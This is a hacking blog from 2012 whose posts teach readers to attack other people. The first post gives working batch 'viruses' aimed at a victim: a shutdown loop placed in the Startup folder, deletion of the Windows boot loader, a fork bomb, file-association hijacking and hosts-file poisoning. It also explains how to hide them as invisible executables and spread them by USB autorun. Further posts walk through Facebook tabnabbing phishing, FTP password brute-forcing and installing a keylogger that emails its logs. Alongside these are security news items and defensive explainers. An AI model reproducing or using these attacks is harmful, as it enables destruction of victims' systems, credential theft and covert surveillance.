This is default featured post 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Tuesday, 20 March 2012

Batch Files!The Art Of Creating Virus.

Hello Guys,Today lets discuss about how to create our own batch virus and spread itI could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready. But instead of that, I have focussed on making the basics of batch files clear and developing the approach to code your own viruses.


What are Batch Files ?

Lets begin with a simple example , Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one


1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'

We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
 
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat
 
Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we ran the batch file


So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.


What can batch viruses do ?


They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.


Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as 'all files' instead of text files).


Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.


1. Application Bomber


@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop


This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.


2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x


Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.


3.User account flooder
@echo off
:x
net user %random% /add //create user account
goto x


This code would start creating windows user accounts whose names could be any random numbers.


3.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds


Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup




Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.


4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply


Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.





Lets make a batch file to
delete this file from victim's computer and the windows will not start then.


attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file


After running this batch file , system will not reboot and a normal victim would definitely install the windows again.





5. Fork Bomb


%0|%0 //Its percentage zero pipe percentage zero


This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .








6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything




Every extension is associated with a filetype like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.




7. DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.


@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file.


Replace xxx.xxx.xxx.xxx and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.


Viruses we just coded







Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.


To overcome these limitations,we need to convert these batch files into executable files that is exe files.
Download this Batch To Exe coverter from here.


After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.


You can use other options as per your requirement.


Spreading batch viruses through pen drive -:


Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico


Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .


When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Sunday, 11 March 2012

HACK FACEBOOK BY TABNABBING-NEW KIND OF PHISHING ATTACK

Hi friends I already posted couple of articles on Phishing.Phishing is the easiest method to hack any kind of account because it doesnt involve any experience of Programming and Hacking.All you need is a bunch of codes(To Create Phishing Pages) and a little common sense on how to trick your victim.

Today I am going to explain one of the new type of Phishing attack called Tabnabbing.
Before reading this article I would strongly recommend you to go through the below articles

How To Hack Gmail By Phishing
How To Hack Facebook By Phishing


What is Tabnabbing?
Tabnabbing also known as ‘Tabnagging‘ and ‘Tabnapping‘ which is a new type of Phishing attack.It works similarly like Phishing but this attack is much more convincing than Phishing.When victim browses on multiple tabs, then one of the tab automatically changes into fake login page when the victim is away from that page.

How It Works?
As stated earlier this attack works when user opens multiple tabs

Initially victim navigates a normal looking page.
When victim switches to another tab, the attacker redirect their site to a phishing page.
When victim came back to attacker page, they’ll see the phishing page.(Victim assumed he open the site previously)
Victim entered their login information and this login information is sent to your server and the phishing page is login successful, so the victim don’t have any clue that their information was hacked.
How To Hack Facebook By Tabnabbing?
Requirements:
1.Basic knowledge on How Phishing works
Read below articles to know how Phishing works:

How To Hack Gmail By Phishing
How To Hack Facebook By Phishing
2.A free web hosting account.
For this I would recommend yourfreehosting.net, 110mb.com, 000webhost.com ,drivehq.com,byehost.com
3.You should have following files which are necessary for Tabnabbing

Facebook.html -Fake Facebook login page (phisher)
login.php - Script which captures the login details of the victim
google.html - Standard google page used to trick the user
tabnabb.js - Java script which is required for tabnabbing
<<<DOWNLOAD ALL THE FILES FROM HERE>>>
Password is alltechbuzz.in


How To Do Tabnabbing~Procedure:


1.After Downloading upload facebook.html ,login.php & google.html to your webhosting excluding tabnabb.js



2.After uploading these three files then open facebook.html and copy the link of facebook.html.



3.Now open tabnabb.js with notepad and search for Enter your url here.
4.Replace it with the url of facebook.html.



5.Now upload tabnabb.js to your web hosting.
6.I hope that now you have successfully uploaded all the files to your webhosting.



7.Now you have to send google.html link to your victim.
8.To know whether your Tabnabbing is working or not just open google.html and open few tabs and wait for few seconds now your google.html will automatically change into facebook.html fake login page.
9.Now if the victim enters his details into the page then the password is yours.


How To Protect Yourself From Such Attacks?

Always keep your Browser and softwares up to date.
Use a Good Antivirus and Anti Malware.
Always check the url in the address bar while you are logging in into some social networking site.
Never enter your password on suspicious web pages.
Update:If you dont want to Tabnabb and if you want to do only Phishing then just send facebook.html page to the victim.Use 000webhost.com for hosting the files.

Saturday, 10 March 2012

New Linux Distribution-BUGTRAQ-l for Pentesting and forensics Released..!!!..

Bugtraq system offers the most comprehensive distribution, optimal, stable and automatic security to date. Bugtraq is a distribution based on the 2.6.38 kernel has a wide range of penetration and forensic tools. Bugtraq can be installed from a Live DVD or USB drive, the distribution is customized to the last package, configured and updated the kernel. The kernel has been patched for better performance to recognize a variety of hardware, including wireless injection patches pentesting that other distributions do not recognize
                                           

Some of the special features that you can appreciate are:
· Administrative improvements of the system for better management of services.
· Expanded the range of recognition for injection wireless drivers.
· Patching the kernel 2.6.38 to recognize 4 gigs of RAM in 32-bit.
· Tools perfectly configured, automated installation scripts and tools like Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG, etc...
· Unique Scripts from Bugtraq-Team (SVN updates tools, delete tracks, backdoors, Spyder-sql, etc.)
· Stability and performance optimized: Enhanced performance flash and java and start purging unnecessary services. So that the user can use only the services you really want.
· It has incorporated the creation of the user in the installation, which is created with all system configurations.
· We are the distribution and Forensic Pentesting with more tools built and functional, well organized menu without repetition of the same to avoid overwhelming the user.
Download Bugtraq-I

Tuesday, 6 March 2012

Automatic SQL Injection Exploitation Tool:The Mole v0.3 Released!!..


Nasel has just released the new version of The Mole, an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.


This release has introduced new features compared with the previous one, among these you can find that The Mole is now able to exploit injections thourgh cookie parameters. A new promising feature is that now you can exploit injections that return binary data, to achieve this the mole uses uses HEAD requests and analyzes the headers received (the size of the binary to download usually differs when the query was successful or not) and does not need to download the full binary data.


In this release there has been a major change in the The Mole's architecture, and now allows to easily insert filters in order to bypass IPS/IDS rules or modify the query on runtime. You can see a tutorial on how to write these filters in the tutorial section of the tool's site.


Feature:

Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
Command line interface. Different commands trigger different actions.
Auto-completion for commands, command arguments and database, table and columns names.
Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
Exploits SQL Injections through GET/POST/Cookie parameters.
Developed in python 3.
Exploits SQL Injections that return binary data.
Powerful command interpreter to simplify its usage.
Download The Mole v0.3
Tutorial link: Tutorial

Tuesday, 14 February 2012

SMU DataBase Leaked By Hackers.


Hacker called Cyber tremmor breached the Sikkim Manipal University(smu.edu.in) security and compromised the students data from the database.

Hacker exposed the personal information of student in pastebin including name, course, roll_no.  Though hacker compromised the data like email address and phone number, he haven't exposed the data publicly.

Pastebin leak:
http://pastebin.com/eEXXFbfG

Friday, 10 February 2012

How To Increase Your You Tube Streaming.


Do you feel that your youtube streaming is very slow even the connection speed is good? This might be the problem due to cache. Don’t worry we can increase that speed. Just follow the below steps that it, you are done.

Step 1
Open any of your favorite video on youtube and right click on the video. Click on the Setting Tab as shown in the below screenshot.




Click on Settings  

Step 2
After clicking on the video you will get small tiny box which specifies as Adobe Flash Player Settings. Here you need to click on the Local Storage link and drag the slider to the end as shown in the below screenshot.




Youtube f=Flash Player Settings

That’s it…!!! Now your videos will stream very fast.

Note: This is only a small tip to improve the performance. There are other various factors that can influence speed.

Thursday, 9 February 2012

Satellite phones vulnerable to eavesdropping.


Security researchers in Germany cracked two encryption standards used for protecting satellite phone signals, giving the ability to eavesdrop on calls over an entire continent.

Researchers at Ruhr University Bochum in Germany cracked the encryption algorithms , known as GMR-1 and GMR-2, are standards used across satellite phone operators, including Thuraya, a leading providers. Their technology is widely used in the Middle East and Africa, including in some military applications.

"We were able to completely reverse engineer the encryption algorithms employed," The Daily Telegraph quoted Benedikt Driessen and Ralf Hund of the university as saying, "Don't Trust Satellite Phones".

According to the Telegraph report, the equipment and software needed to intercept and decrypt satellite phone calls from hundreds of thousands of users would cost as little as $2,000.

The demo takes up to half-an-hour to decipher a call, but a more powerful computer would allow eavesdropping in real time, Mr Driessen said.

The Ministry of Defence has said the crack of the A5-GMR-1 and A5-GMR-2 encryption algorithms will not affect military operations.

"All military users of mobile satellite communication systems are aware of the potential threats to such systems and are briefed explicitly that they are only authorised to pass unclassified information (both voice and data) over these systems," an MoD spokeswoman said in an email statement. "Protected information is never sent over an unclassified system, unless it is being employed in conjunction with an accredited secure device."

Wednesday, 8 February 2012

Man In The Middle (MITM) Attack.



Man in the middle attack is a type of attack in which the attacker intercept into the existing connection and breaks it in two different connections, one between the client and the attacker and the other between the attacker and the server. Now all the data would go through the attacker and he would be able to read, modify and insert data in the communication. Man in the middle attacks are sometimes known as fire brigade attacks.
This attack is very effective on http protocol because data is seny on plain text form. It is possible to capture session cookies by header and also possible to change.


                               MITM Attack tools:
There are several tools to perform a MITM attack.
  1. PacketCreator
  2. Ettercap
  3. Dsniff
  4. AirJack
  5. Cain e Abel

Monday, 6 February 2012

How to hack IIS ( internet information server ) FTP password by useing Brute Force Attack.

FTP is an application or service or protocol which can be used to transfer files from one place to another place ,it really comes very handy during transfer of files from a local box to a remote one .Suppose someone get access to your FTP then he/she can cause nightmare for you by uploading unappropriate images or files etc.Here we will discuss how we can crack the password of IIS installed FTP service in Windows.




What is Brute-Force?

Brute-force is a type of attack in which every possible combination of letters, digits and special characters are tried until the right password is matched with the username. The main limitation of this attack is its time factor. The time it takes to find the proper match mainly depends on the length and complexity of the password.Here I will be using this attack to crack the password.So,lets start….
Requirements:
  1. The tool we will be using ” BrutusA2”(Downloadhttp://www.hoobie.net/brutus/)
  2. You need to know the target suppose “ftp://123.123.xx.xxx”

Procedure:

Step 1.Here I have shown an authentication page of an FTP service in the image below and in the following steps we will crack its password using brutus.

Step 2.Now open up “Brutus” and type your desire target ,select wordlist and select “FTP” from the drop down menu and click start. If you are confused then follow the image below.


Step 3.The time it takes as I mentioned above depends on the complexity and length of the password.So after clicking the start button wait for the time as mentioned in the tool.The password will be displayed as shown above.
Recommendation: I would recommend the readers to try it in a virtual environment as I did and enjoy the trick.It is not advisable to try it on some unknown user without prior permission.

Key Logger for LINUX UBUNTU.


I am searching for a keylogger for Ubuntu Linux. Finally I found it in sourceforge.net. Here are the simple steps for keylogger in ubuntu

What is Keylogger?

Keystroke logger is the practice of noting (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored. There are numerous keylogging methods, ranging from hardware- and software-based to electromagnetic and acoustic analysis.


keylogger in Linux
We have an opensource software available for Linux called lkl (Linux Key Logger).
LKL is a userspace keylogger that runs under linux–x86/arch. LKL sniffs and logs everything passes trought the hardware keyboard port (0×60).
Download key logger here

How to Install?

Step 1
Unzip or untar the file you have downloaded
Step 2
Change in to directory by typing cd lkl
Step 3
Give the below command ./confiure
This will check all the required resurces it needs
Step 4
Type `make‘ to compile the package.
Step 5
Optionally, type `make check’ to run any self-tests that come with the package.
Step 6
Type `sudo make install‘ to install the programs
Now you are done with the installation
How to use?
You can send argument with the command lkl
-h help
-l start to log the 0×60 port (keyboard)
-b debug mode
-k <km_file> set a keymap file
-o <o_file> set an output file
-m <email> send logs to <email>
-t <host> hostname for sendmail. Default is localhost
Example: lkl -l -k us_km -o log.file // use USA kb and put logs in ‘log.file’

Please comment on the same if it doesn’t works for you

Sunday, 5 February 2012

What Is Spyware?

                                          
A spyware is a piece of malicious code or program installed in system to monitor activities of a person. A spyware is capable of logging key strokes, it can take screen shots and if there is active Internet connection then it can even mail logs to specified email-address or transfer logs to ftp server.
Beyond just monitoring it can record your computing habits including which site you browse more, at what time you prefer to be on system or amount of time you spend on computer.
                                    
A spyware can be used to track all information about your social-networking habits and IRC(Internet Relay Chat) Clients including all major and minor chat clients example: Google Talk, Rediff Messenger, Yahoo Messenger, Microsoft Live Chat, absolutely every thing related to IRC client is exposed to spyware. On the basis of its commercial use and monitoring capabilities spywares are classified as follows,

On Basis Of Commercial Use: Domestic Spywares and Commercial Spywares
On Basis Of Monitoring: Key Loggers, E-mail Loggers/Chat Recorders, Screen Recorders.

Domestic Spywares:
This kind of spywares are purchased and used by common people to monitor their system. Most of the times parents install this type of spyware to monitor their children or network admin or a company to monitor computing activities of their employees. The most widely and most powerful use of these spywares are done for hacking purposes only.
Example: SniperSpy, Winspy, Sentry PC, Spy Agent

Commercial Spywares: Commercial Spywares incude the services included in your Operating System and softwares to monitor event logs and crash reports. The information about software crash is anonymously sent to software vendors, also the reports about user experience, crash, memory dump etc are sent to Operating System Vendor. The only fact is that this type of spying is legal to improve product and provide better and secure service.
Example:Windows and Linux Crash Logs, Virus info in Anti-Virus program, Event Collectors etc.

Key Loggers: Key loggers are spywares specially made to record keystrokes from keyboard. Key Logging can retrieve information about bank account password, online transactions, login passwords etc.

E-mail Loggers/Chat Recorders:These spywares are used to track e-mails and chat report from your IRC. If you use e-mail client like Windows Mail or Mozilla Thunderbird etc. Then these spywares are capable of modifying internal settings to forward mails to attacker's inbox without keeping a track in your Outbox.

Screen Recorders: Screen recorders are capable of capturing screen and send recording using minimum bandwidth. Such monitoring is done by parents on their children to protect them from online pornography.
Example:Spy Agent, Winspy, Sniper Spy

Ok being honest I want to clear that today actually nobody bothers about classification of spyware and reason is quite obvious that spyware manufactures pack their spywares with nearly 90% of features of all types of spywares. So if you don't want to remember classification of spyware then its ok, no problem at all but you must know what is spyware. Sorry forgot you already know that.

Dedicated Search Engine for Exploit.

 Exploitsearch.net - Exploit & Vulnerability Search Engine


This is a online search for Exploits currently utilizing data from NVD, OSVDB, SecurityFocus, Exploit-DB, Metasploit, Nessus, OpenVAS, and PacketStorm.Well search engine does the work but this is a specific search engine for better results. There not much to write about just visit the site and all your queries will be answered.
VISIT : http://www.exploitsearch.net/

Friday, 3 February 2012

Call of Duty, Spider-Man and other 7 Largest Video Game Sites Hacked


Today Turkish Hackers from group "GrayHatz" hack and Deface Call of Duty, Spider-Man and other 7 Largest Video Game Sites.

Hacked Sites Include:- Call of Duty® Official Video Game Site : Link and Mirror
- X-Men Origins: Wolverine Official Video Game Site : Link and Mirror
- Spider-Man: Edge of Time Official Game Website
- Transformers: Fall of Cybertron Official Video Game Site : Link and Mirror
- Prototype 2 Official Video Game Site : Link and Mirror
- Infinity Ward Developer of Call of Duty : Link and Mirror
- The Quantum Of Solace Game Official Video Game : Link and Mirror
- DJ Hero 2 | Available Now Official Site : Link and Mirror
- Guitar Hero Official Site : Link and Mirror

Monday, 30 January 2012

What is Keylogger?


keylogger 300x225 What You Need To Know About Keylogger

Just like in any other things, to be able to detect things and to know how to prevent it, you must be aware of how it works. Keylogger is a software program that tracks your online act and keyboard stroke. This software is used by thieves in accessing your accounts
 How does keylogger works?
You wont even notice that your computer slows down. Key logger works just like a thief in the night. It records your keyboard stroke and all the information you typed. Key loggers are usually used by the company to record their employees activities, or at home when parents want to monitor their kids computer activities. However, when key loggers are used by hackers, their intention is to manipulate your account and use it for their personal interest. This is extremely dangerous.
When another party accessed your account, all the information can be used without your actual consent. This can be dangerous, as that means they can transfer, purchase and transact on your behalf. Even worse, they can manipulate your whole account like websites, social accounts, etc. And for some, retrieving it can be very difficult.

What you need to know about keylogger

There are 2 types of keyloggers: The software-based keyloggers and the hardware based key. The software based keyloggers are software that are designed to work on the computer operating system while hardware-based keyloggers do not need software as they can be found at the hardware level of your computer system.

How To Protect Your Computer From Keylogger

Now that you know the risks of being a victim of keylogger, the next question is, is there a way to avoid it? The answer is yes!
You can opt for one of more of the following:Use Anti-keylogger software. This software works by detecting keyloggers on your computer.
  • Using live CD/USB. You can reboot your computer with teh use of live cd or usb ( USB must be write protected). Booting using a different operating system does not affect the use of hardware or BIOS based keylogger.
  • Using anti-spyware and anti-virus programs. It is important that you update them regularly.
  • Using robo-forms or any automatic form filler. This will lessen the needs for you to type details and passwords using the keyboard.
  • Use a firewall to help stop unauthorized computer activities.
  • Avoid opening email attachments from unknown source.
  • Avoid suing public computers in accessing your online accounts.
  • Run weekly scan to your computers.
Remember that there is no particular software or technique that will be 100% effective against all kinds of keyloggers. You can protect yourself  by being extra careful in opening websites and downloading applications. You are more protected from being keylogger victim when you know you have to be extra careful.

Incoming search terms: